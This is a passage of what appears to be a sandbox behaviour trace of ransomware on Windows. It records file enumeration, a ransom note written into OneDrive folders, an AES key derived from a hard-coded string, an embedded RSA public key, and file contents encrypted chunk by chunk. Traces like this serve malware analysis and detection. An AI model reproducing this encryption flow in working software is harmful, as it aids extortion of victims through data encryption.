cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.520] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.521] GetFileType (hFile=0x5d4c) returned 0x1 [0274.521] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.530] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.530] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0274.530] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.530] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.530] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.530] GetLastError () returned 0x0 [0274.530] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.531] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.532] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.533] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\et\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.560] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\et\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.560] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a410) returned 1 [0274.572] CryptCreateHash (in: hProv=0x2f2a410, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.572] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.572] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.572] CryptDeriveKey (in: hProv=0x2f2a410, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb7c8) returned 1 [0274.572] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.572] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.572] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a6b8) returned 1 [0274.573] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a6b8, dwCertEncodingType=0x1, pInfo=0x2f33880*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f338b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f338b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb288) returned 1 [0274.573] CryptEncrypt (in: hKey=0x2fb288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.573] CryptEncrypt (in: hKey=0x2fb288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a300*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a300*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2a300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a300*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.576] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.576] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.577] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.577] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.577] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.577] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.577] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.578] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.578] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.578] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.578] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.579] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.579] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.580] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.580] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.580] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.581] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.581] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.581] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.594] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.595] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.596] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.596] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.597] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.598] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 